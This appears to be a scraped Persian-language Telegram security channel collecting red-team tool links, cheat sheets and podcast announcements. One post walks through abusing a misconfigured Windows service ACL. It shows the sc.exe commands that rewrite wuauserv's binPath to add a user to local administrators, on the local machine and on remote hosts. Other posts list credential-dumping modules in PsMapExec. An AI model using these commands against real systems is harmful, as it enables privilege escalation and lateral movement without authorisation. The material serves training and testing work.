Parrot Security Edition
یک سیستم عامل خاص است که برای تست نفوذ و عملیات #RedTeam طراحی شده است. این شامل زرادخانه کاملی از ابزارهای آماده برای استفاده است .
https://www.parrotsec.io/
#OS #linux #pentesting #parrot
@TryHackBox
یک سیستم عامل خاص است که برای تست نفوذ و عملیات #RedTeam طراحی شده است. این شامل زرادخانه کاملی از ابزارهای آماده برای استفاده است .
https://www.parrotsec.io/
#OS #linux #pentesting #parrot
@TryHackBox
🔥1
یک محیط مجازی با سیستم عامل های واقع گرایانه و آسیب پذیری های مختلف برای تیم های قرمز
این مطالب برای تیم قرمز، تیم آبی، نفوذگران و متخصصان امنیت اطلاعات بسیار مفید خواهد بود.
#RedTeam
@TryHackBox
@TryHackBoxOfficial
این مطالب برای تیم قرمز، تیم آبی، نفوذگران و متخصصان امنیت اطلاعات بسیار مفید خواهد بود.
https://github.com/Marshall-Hallenbeck/red_team_attack_lab
#RedTeam
@TryHackBox
@TryHackBoxOfficial
GitHub
GitHub - Marshall-Hallenbeck/red_team_attack_lab: Red Team Attack Lab for TTP testing & research
Red Team Attack Lab for TTP testing & research. Contribute to Marshall-Hallenbeck/red_team_attack_lab development by creating an account on GitHub.
🔥3
🗄Microsoft SQL DBMS
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
🔥2
دایرکتوری های مهم ویندوز برای کارشناسان امنیتی، تحلیلگران SOC و متخصصان تیم قرمز.
#tips #redteam #soc
@TryHackBox
@TryHackBoxOfficial
#tips #redteam #soc
@TryHackBox
@TryHackBoxOfficial
👍5
ابزار OWASP OFFAT به طور مستقل API شما را از نظر آسیب پذیری های رایج ارزیابی می کند، اگرچه سازگاری کامل با OAS v3 در انتظار است. این پروژه همچنان یک کار در حال پیشرفت است و به طور مداوم به سمت تکمیل در حال پیشرفت است
https://github.com/OWASP/OFFAT
#pentest #redteam
@TryHackBox
https://github.com/OWASP/OFFAT
#pentest #redteam
@TryHackBox
🔐 CVE-2024-21111
- افزایش دسترسی لوکال در Oracle VirtualBox
یک نوشته دقیق که از طریق آن نحوه کشف و بهره برداری از یک آسیب پذیری در نرم افزار کراس پلتفرم محبوب اوراکل را خواهید آموخت
https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
#pentest #writeup #redteam
@TryHackBox
- افزایش دسترسی لوکال در Oracle VirtualBox
یک نوشته دقیق که از طریق آن نحوه کشف و بهره برداری از یک آسیب پذیری در نرم افزار کراس پلتفرم محبوب اوراکل را خواهید آموخت
https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
#pentest #writeup #redteam
@TryHackBox
🏭 اگر درگیر تست نفوذ هستید، ممکن است اغلب کنترلکنندههای منطقی قابل برنامهریزی (PLC)، دستگاههایی که برای کنترل پروسس های صنعتی استفاده میشوند، در زیرساخت داخلی کلاینت پیدا کنید.
🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.
✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.
👩💻 GitHub
#pentest #redteam #tools
@TryHackBox
🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.
✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.
👩💻 GitHub
#pentest #redteam #tools
@TryHackBox
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
دستورات مهم لینوکس: برای تحلیلگر SOC توجه داشته باشید
#incedentresponse #redteam #infosec #SOC #linux
@TryHackBox
#incedentresponse #redteam #infosec #SOC #linux
@TryHackBox
👍3
💡 برگه تقلب اکتیو دایرکتوری
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.
🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.
• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate
👉 GitHub
#redteam #pentest #cheatsheet
@TryHackBox
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.
🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.
• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate
👉 GitHub
#redteam #pentest #cheatsheet
@TryHackBox
🖥 مخزن: Vuls – اسکنر آسیب پذیری
Vuls
یک اسکنر آسیبپذیری منبع باز برای Linux، FreeBSD، Container، WordPress، کتابخانههای زبان برنامهنویسی، دستگاههای شبکه است که در Go نوشته شده است.
- این ابزار تجزیه و تحلیل آسیب پذیری های نرم افزار نصب شده بر روی سیستم را خودکار می کند ، که انجام دستی در یک محیط تولید بسیار دشوار است.
https://github.com/future-architect/vuls?tab=readme-ov-file
#Web #Redteam #Recon
@TryHackBox
Vuls
یک اسکنر آسیبپذیری منبع باز برای Linux، FreeBSD، Container، WordPress، کتابخانههای زبان برنامهنویسی، دستگاههای شبکه است که در Go نوشته شده است.
- این ابزار تجزیه و تحلیل آسیب پذیری های نرم افزار نصب شده بر روی سیستم را خودکار می کند ، که انجام دستی در یک محیط تولید بسیار دشوار است.
https://github.com/future-architect/vuls?tab=readme-ov-file
#Web #Redteam #Recon
@TryHackBox
GitHub
GitHub - future-architect/vuls: Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language…
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices - future-architect/vuls
پیکربندی ناامن ACL های سرویس از طریق group policies
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
سرویس را شروع کنید:
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
MATCH(g:GPO {name:"[email protected]"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.nameاگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"
سرویس را شروع کنید:
sc.exe start wuauserv
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
⚒️ SigmaPotato
- ابزار افزایش دسترسی SeIpersonate برای Windows 8-11 و Windows Server 2012-2022 با پشتیبانی پیشرفته از PowerShell و بازتاب .NET
👉 GitHub
#redteam #tools
@TryHackBox
- ابزار افزایش دسترسی SeIpersonate برای Windows 8-11 و Windows Server 2012-2022 با پشتیبانی پیشرفته از PowerShell و بازتاب .NET
👉 GitHub
#redteam #tools
@TryHackBox
👍4
Forwarded from P.F.K Security
Media is too big
VIEW IN TELEGRAM
در این جلسه، تمرکز بر روی تاکتیکهای تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره میشود که دستگاههای روزمره مانند توسترها و توالتها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمیشوند. سخنران که یک تحلیلگر امنیتی در Black Hills Information Security است، بر اهمیت یادگیری و آموزش تکنیکهای هک تأکید میکند.
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity
قسمت سوم زیرو تاک
@RadioZeroPod | @TryHackBox
⭕ قسمت سوم زیرو تاک - بخش دوم
🔶 مهندس سهیل هاشمی - با محوریت RedTeam
💢 مفاهیم تخصصی ردتیم
🟠 4. تعریف ردتیم
🟠 5. مقایسه تیمهای امنیتی
🟠 6. ردتیم در مقابل تست نفوذ کلاسیک
💢 بخش سوم: عملیات ردتیم
🔴 7. مراحل اصلی عملیات ردتیمینگ
🔴 8. روایت واقعی از مهندسی اجتماعی
🔴 9. چالشهای سازمانی
🔴 10. شاخصهای موفقیت
💢 بخش چهارم: آینده و توسعه فردی
🟡 11. تأثیر هوش مصنوعی و یادگیری ماشین
🟡 12. رودمپ پیشنهادی برای شروع
🟡 13. آمادهسازی محیط آزمایشگاهی
🔶️ در نهایت سوالاتی از جانب شرکتکنندگان پرسیده شد و مهندس به آن مفصلا جواب داد.
🎤 راهبر گفتگوی امنیتی : حسین نائیجی
#بخش_دوم #RedTeam
@RadioZeroPod
@TryHackBox
🔶 مهندس سهیل هاشمی - با محوریت RedTeam
💢 مفاهیم تخصصی ردتیم
🟠 4. تعریف ردتیم
🟠 5. مقایسه تیمهای امنیتی
🟠 6. ردتیم در مقابل تست نفوذ کلاسیک
💢 بخش سوم: عملیات ردتیم
🔴 7. مراحل اصلی عملیات ردتیمینگ
🔴 8. روایت واقعی از مهندسی اجتماعی
🔴 9. چالشهای سازمانی
🔴 10. شاخصهای موفقیت
💢 بخش چهارم: آینده و توسعه فردی
🟡 11. تأثیر هوش مصنوعی و یادگیری ماشین
🟡 12. رودمپ پیشنهادی برای شروع
🟡 13. آمادهسازی محیط آزمایشگاهی
🔶️ در نهایت سوالاتی از جانب شرکتکنندگان پرسیده شد و مهندس به آن مفصلا جواب داد.
🎤 راهبر گفتگوی امنیتی : حسین نائیجی
#بخش_دوم #RedTeam
@RadioZeroPod
@TryHackBox
❤6👍4⚡1
C2Matrix TryHackBox.xlsx
94.3 KB
🔖 چگونه یک فریم ورک C2 انتخاب کنیم ؟
پس از اتمام این کتاب، ممکن است سوالاتی براتون پیش بیاد و امیدواریم یکی از آنها این باشد: «چگونه بدونم کدوم فریم ورک C2 رو برای عملیاتهای تیم قرمز خود انتخاب کنم؟» پاسخ درست یا غلطی برای این سوال وجود ندارد، فقط چند سوال کلی که ابتدا باید به آنها پاسخ بدید :
اهداف شما چیست؟
آیا بودجهای دارید؟
آیا به چیزی بسیار قابل تنظیم نیاز دارید؟
آیا از Evasion آنتیویروسهای آماده (Off-the-shelf AV Evasion) ضروری است؟
آیا نیاز دارید که بتوانید ماژولها/اسکریپتهای خودتان را ایجاد کنید؟
آیا گزارشگیری داخلی برای شما ضروری است؟
سپس باید این اطلاعات را به فایل xlsx گسترده C2 Matrix ببرید و انتخاب خود را بر اساس سوالات بالا محدود کنید. اگر یک فریم ورک C2 پریمیوم پیدا کردید که معیارهای شما را برآورده میکند، به شدت توصیه میشود که درخواست یک نسخه آزمایشی/ارزیابی کنید تا ببینید آیا آن فریم ورک C2 برای شما بهترین گزینه است یا خیر.
مطالب بخشی از کتاب ردتیم ما که در حال آماده شدن است .
@TryHackBox | #RedTeam
پس از اتمام این کتاب، ممکن است سوالاتی براتون پیش بیاد و امیدواریم یکی از آنها این باشد: «چگونه بدونم کدوم فریم ورک C2 رو برای عملیاتهای تیم قرمز خود انتخاب کنم؟» پاسخ درست یا غلطی برای این سوال وجود ندارد، فقط چند سوال کلی که ابتدا باید به آنها پاسخ بدید :
اهداف شما چیست؟
آیا بودجهای دارید؟
آیا به چیزی بسیار قابل تنظیم نیاز دارید؟
آیا از Evasion آنتیویروسهای آماده (Off-the-shelf AV Evasion) ضروری است؟
آیا نیاز دارید که بتوانید ماژولها/اسکریپتهای خودتان را ایجاد کنید؟
آیا گزارشگیری داخلی برای شما ضروری است؟
سپس باید این اطلاعات را به فایل xlsx گسترده C2 Matrix ببرید و انتخاب خود را بر اساس سوالات بالا محدود کنید. اگر یک فریم ورک C2 پریمیوم پیدا کردید که معیارهای شما را برآورده میکند، به شدت توصیه میشود که درخواست یک نسخه آزمایشی/ارزیابی کنید تا ببینید آیا آن فریم ورک C2 برای شما بهترین گزینه است یا خیر.
مطالب بخشی از کتاب ردتیم ما که در حال آماده شدن است .
@TryHackBox | #RedTeam
❤5👍4👎1
ابزار ADKAVEH: شبیهسازی حملات و شناسایی در Active Directory با PowerShell
ADKAVEH یک اسکریپت PowerShell است که به تیمهای امنیتی امکان شبیهسازی حملات و شناسایی در محیطهای Active Directory را میدهد. این ابزار شامل ماژولهایی برای شبیهسازی حملاتی مانند Kerberoasting، AS-REP Roasting، Password Spraying و تست های اختیاری برای غیرفعالسازی Windows Defender است.
https://github.com/TryHackBox/ADKAVEH
#tools #AD #RedTeam
@KavehOffSec
@TryHackBox
ADKAVEH یک اسکریپت PowerShell است که به تیمهای امنیتی امکان شبیهسازی حملات و شناسایی در محیطهای Active Directory را میدهد. این ابزار شامل ماژولهایی برای شبیهسازی حملاتی مانند Kerberoasting، AS-REP Roasting، Password Spraying و تست های اختیاری برای غیرفعالسازی Windows Defender است.
https://github.com/TryHackBox/ADKAVEH
#tools #AD #RedTeam
@KavehOffSec
@TryHackBox
GitHub
GitHub - TryHackBox/ADKAVEH: ADKAVEH - One PowerShell script for Active Directory discovery and safe attack simulation.
ADKAVEH - One PowerShell script for Active Directory discovery and safe attack simulation. - GitHub - TryHackBox/ADKAVEH: ADKAVEH - One PowerShell script for Active Directory discovery and safe ...
❤6
#redteam #security
🔐 Weakpass
— یکی از بزرگترین مجموعه های دیکشنری های پسورد برای اهداف مختلف: از تست نفوذ تا افزایش امنیت پسوردها.
از ویژگیهای جدید موجود میتوان به موارد زیر اشاره کرد:
• API
برای سادهسازی استفاده از سرویس.
• دیکشنریهای پیشمحاسبه شده برای MD5، NTLM، SHA1 و SHA256.
• امکان جستجو بر اساس هشهای MD5، NTLM، SHA1 و SHA256.
• قابلیت تولید پسورد.
https://weakpass.com/
@TryHackBox
🔐 Weakpass
— یکی از بزرگترین مجموعه های دیکشنری های پسورد برای اهداف مختلف: از تست نفوذ تا افزایش امنیت پسوردها.
از ویژگیهای جدید موجود میتوان به موارد زیر اشاره کرد:
• API
برای سادهسازی استفاده از سرویس.
• دیکشنریهای پیشمحاسبه شده برای MD5، NTLM، SHA1 و SHA256.
• امکان جستجو بر اساس هشهای MD5، NTLM، SHA1 و SHA256.
• قابلیت تولید پسورد.
https://weakpass.com/
@TryHackBox
❤4👌3
🔖 PsMapExec v0.9.0
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
ماژول های اضافی در LDAP:
روشها (پروتکل) فعلی که پشتیبانی میشوند:
ماژول های پیاده سازی شده:
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
پشتیبانی از چند دامنه
بهبود عملکرد از طریق Proxifier / تونلهای SSH
امکان روشن/خاموش کردن RDP
ماژولهای جدید:
EventCreds
ماژول های اضافی در LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs
روشها (پروتکل) فعلی که پشتیبانی میشوند:
RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast
ماژول های پیاده سازی شده:
Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایلها در دایرکتوریهای متداول
KerbDump — دامپ تیکتهای Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگآن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیادهسازی DCsync
SAM — دامپ SAM
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
❤3👍3
SE in Red Teaming by THB Team.pdf
1.2 MB
🔖 مهندسی اجتماعی در ردتیمینگ
⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست
@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
این راهنمای خلاصه و عملی یک مرجع کاربردی برای طراحی و اجرای سناریوهای اجتماعی مهندسی در عملیاتهای ردتیم است:
تاثیرات مهندسی اجتماعی
تکنیک های رایج مهندسی اجتماعی
ابزارها و تکنیک ها
ابزارهای اوسینت
⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست
⭕️ شما کدام تکنیکِ مهندسی اجتماعی (فیشینگ، pretexting، یا baiting) رو بیش از همه برای سناریوهای ردتیم مؤثر میدونید؟ نظر خودتون رو بنویسید.
@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
🔥9